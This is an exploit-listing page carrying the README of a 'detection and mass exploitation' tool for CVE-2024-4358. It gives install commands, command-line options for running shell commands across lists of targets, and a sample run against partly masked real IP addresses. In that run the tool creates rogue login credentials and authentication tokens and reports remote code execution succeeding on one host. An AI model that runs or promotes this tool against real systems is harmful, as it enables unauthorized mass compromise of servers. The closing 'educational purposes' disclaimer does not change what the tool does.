## https://sploitus.com/exploit?id=02BB892D-B08E-5058-AFF4-A1056D4B0170
# CVE-2024-4358
A vulnerability detection and mass exploitation tool for CVE-2024-4358.

### Installation:
```bash
git clone https://github.com/RevoltSecurities/CVE-2024-4358
# requirements.txt and exploit.py are inside the cloned directory
cd CVE-2024-4358
pip install -r requirements.txt
python3 exploit.py --help
```
### Usage:
```yaml
python3 exploit.py -h                                                                           


    ______     ____  __         _ ______         
   / ____/  __/ __ \/ /  ____  (_)_  __/__  _____
  / __/ | |/_/ /_/ / /  / __ \/ / / / / _ \/ ___/
 / /____>  </ ____/ /__/ /_/ / / / / /  __/ /    
/_____/_/|_/_/   /_____|____/_/ /_/  \___/_/     
  
                    @RevoltSecurities

[Description]: Vulnerability Detection and Exploitation tool for CVE-2024-4358

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     [INF]: Specify a URL or IP wtih port for vulnerability detection
  -l LIST, --list LIST  [INF]: Specify a list of URLs or IPs for vulnerability detection
  -c COMMAND, --command COMMAND
                        [INF]: Specify a shell command to execute it
  -t THREADS, --threads THREADS
                        [INF]: Number of threads for list of URLs
  -proxy PROXY, --proxy PROXY
                        [INF]: Proxy URL to send request via your proxy
  -v, --verbose         [INF]: Increases verbosity of output in console
  -o OUTPUT, --output OUTPUT
                        [INF]: Filename to save output of vulnerable target]

```

### Sample Usage:
```yaml
python3 exploit.py -l urls.txt -c id -t 10                                                      


    ______     ____  __         _ ______         
   / ____/  __/ __ \/ /  ____  (_)_  __/__  _____
  / __/ | |/_/ /_/ / /  / __ \/ / / / / _ \/ ___/
 / /____>  </ ____/ /__/ /_/ / / / / /  __/ /    
/_____/_/|_/_/   /_____|____/_/ /_/  \___/_/     
  
                    @RevoltSecurities

[Vulnerale]: Report for: http://13.42.129.XXX
 Login Crendentials: Usename: ozsebbQpibJbHpghuNLxutxBOl | Password: NvmpjJucmxtqhOtdFtrxfoguvQ | Authentication Token: 7CKVJAPcvFGsfIwxON6KgCy85k8xwDXoKGzV1A3KgUeB-y-DQ_F6k86XjY9KCbSjuHcaog-AJ8AApDtOkGvDw109zvjJUllJESksFmxd8ZK8r1Xdn8u-5sHX-RWmbJBEg5tDSOaQrPPNCds7RyzhEGcTiVbG0gDUfiIFgmwNWa1i8VOhhTgASDARnfPXfOfqsWqv23SrLXteuEXNymjDrC-GXWvhRHZ8a_vWhfJBSBB7aBZmXux1iq07InnAPwYC2Y12TrEG6MUPPCBHSW-vlld850MBuCktR7vjLdzahJAAdERMbAudSnetHBY4AN-221F6iIY2GjjenRiNCnJOt8gfK3I5b57d6QFy3i3a4GxnM-5AUfTGrbHrHrxP5hzpfz5bhG-xulDTyOK-g6UJJQOQBIWHIUA-QOzOufSNovv0gBnhilYBTY9ITDJSOOWSdxDVmr4U4re8xI_3InkeK8IRkIzMmTxrrnQi_J8or0hqP-7yMPCJR5gIQrOMUXPtatpVqZikho8aR3aWCcAHmoJr5yU
 Deserialization RCE: Failed
[Vulnerale]: Report for: http://52.2.58.XX
 Login Crendentials: Usename: pjzgrOrjJXqQyFoubmrcSkHZHC | Password: ZrGVXZqIrgWkuHCgUlkHIeYPG | Authentication Token: S6q_Le5LoTqew1AmblOvZfBU5R7U0BEcBJ84UvvBf2HnUzJ_wCtstEYHqhxgEBSj7uWQ7iCCoW-_I5Z7XXpkolAN831q_NWsarTsqbm98XKP5CToJ_7lrS_1SbWCd6TJbdrBYHoSCEnRF0DMbhPzdY4TGv9P7gJQHf37jPm2lkDfC6kLyBXFopZklIwv6WrvmFw04vzLDKCWpgLP88GGqRKPJPnMNNarIUu9Mn_fV2WOei4LFWJMnmHTyLPAhK7eMLmjGmwr6jgRQp7C7PhNIpugRvUkyS8381ddVcXV8LJv2OR2yA2e2efE-Oc0
 Deserialization RCE: Failed
[Vulnerale]: Report for: http://194.233.XXX.235:83
 Login Crendentials: Usename: YmWwYloORUtOUPGuVDCbxZmuEKoIPL | Password: EPuvJTzroIfncpAHHGjJYXAKaPhQMW | Authentication Token: Ja42x9_DsL88xoSpm9xJoVIyeYEesbK2p-tZnOP-yvuiiF_DYNA6vNBeIwe8y2OcUJuOcCPtR_ODGynVtgCMmtpZxb_KRusasjNrlM2cNPKP4omDYacvcejGPycPmmd_A4Qi0ohEPG3Y4JfaU7Le3DJlMSTEoneCqcrXRqNS2JbTIXzOSXM3dSMz_0AwgHVN4H35HCkcAbedA5c-OLv_d6n9evsyHiHm15FuqbWzzqq-nTcXRiUtSYXEspCyiXE22ZlRdzClA6WDKC0-b1kFWj4Jb1yr3WULzmYHespHoRnXti_1gJoRs6Qbv2
 Report created: ELHaimYtblAxViEKIXxpdFyOXNlEHb
 Deserialization RCE: Success
Exploiter |████████████████████████████████████████| 3/3 [100%] in 7.5s (0.34/s)
```

### INFO:
The tool is developed by [D.Sanjai Kumar @RevoltSecurities](https://www.linkedin.com/in/d-sanjai-kumar-109a7227b/) to detect and mass exploit the vulnerability CVE-2024-4358.
The tool is for educational and ethical purposes only, and the developers are not responsible for any illegal exploitation.